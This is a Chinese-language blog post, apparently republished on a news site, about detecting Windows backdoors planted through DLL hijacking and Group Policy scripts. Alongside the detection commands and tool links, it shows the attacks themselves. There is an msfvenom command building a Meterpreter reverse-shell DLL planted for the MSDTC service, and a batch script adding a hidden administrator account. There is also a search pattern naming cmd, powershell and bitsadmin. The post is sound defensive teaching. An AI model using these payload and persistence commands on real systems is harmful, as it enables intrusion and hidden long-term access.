当前位置：首页 > news >正文

Windows后门排查_2025/11/24（持续更新）

news 2026/6/14 21:28:52

Windows后门排查

dll劫持

dll劫持介绍

劫持原理：

为了性能需求，程序开发时会同时开发一些dll文件，不过并没有指明绝对路径；所以程序启动时就会寻找并加载这些dll文件，寻找并加载的优先级如下：

1.应用程序所在目录
2.C:\Windows\System32
3.C:\Windows\System
4.C:\Windows
5.当前工作目录
6.PATH环境变量中的目录

如果用户有权限修改替换其中的文件为后门，当程序启动时就会运行后门。

示例（MSDTC服务）：

当MSDTC服务启动时，它将搜索注册表中的dll文件oci.dll、SQLLib80.dll、xa80.dll：

Windows系统默认不包含oci.dll，我们通过如下方式生成一个恶意的oci.dll文件：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 -f dll >oci.dll

将这个恶意文件上传到 C:\Windows\System32 目录下，重启msdtc服务就能加载后门。

taskkill /f /im msdtc.exe
net start msdtc

检测手段

1.排查常见劫持DLL文件名

目录	常见劫持DLL文件名
C:\ProgramData\	version.dll, wlbsctrl.dll, cryptsp.dll
C:\Windows\Temp\	version.dll, VBoxService.dll
%TEMP%	nvcuda.dll, dwmapi.dll
C:\Users\Public\	COMCTL32.dll, powrprof.dll
C:\Windows\System32\spool\drivers...	printconfig.dll

# 1. 检查WMI劫持
Get-ChildItem "C:\Windows\System32\wbem\" -Include version.dll,wlbsctrl.dll -Recurse
Get-ChildItem "C:\ProgramData\" -Include version.dll -Recurse# 2. 检查打印机驱动劫持
Get-ChildItem "C:\Windows\System32\spool\drivers\x64\3\" -Include *.dll -Recurse# 3. 检查TS远程桌面劫持（tsappcmp.dll, tsmsisrv.dll）
dir "C:\ProgramData" tsappcmp.dll /s

2.工具扫描

https://github.com/yeyintmynwht/DLL-Hijacking-Scanner

https://github.com/stephenfewer/ReflectiveDLLInjection/tree/master/dll_hijack_detect

https://learn.microsoft.com/sysinternals/downloads/process-explorer）

组策略

组策略脚本

内容：

创建一个脚本，内容是添加隐藏用户：

@echo off
net user test$ 123456 /add
net localgroup administrators test$ /add
exit

打开组策略添加脚本：

关机后就会执行脚本。

检测手段

1.直接打开组策略编辑器检查

类型	GPO路径（域控SYSVOL）	典型恶意文件
计算机启动/关机脚本	`\\domain\SYSVOL\domain\Policies\{GPO-GUID}\Machine\Scripts\Startup`	.ps1 / .bat / .vbs / .exe
计算机启动/关机脚本	`...Shutdown`	同上
用户登录/注销脚本	`...Policies\{GPO-GUID}\User\Scripts\Logon`	.ps1 / .bat / .vbs / .exe
用户登录/注销脚本	`...Logoff`	同上

2.通过组策略脚本执行的注册表持久化

搜索所有组策略下发的注册表项（重点看Run键）

Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies" -Recurse -Include Registry.xml | ForEach-Object {Select-String -Path $_ -Pattern "Run|RunOnce|AppInit_DLLs|IFEO|shell|powershell|cmd|bitsadmin" -Context 0,5
}

3.工具扫描：

红队利用工具：https://github.com/FSecureLABs/SharpGPOAbuse

查看全文

http://www.gsyq.cn/news/59415.html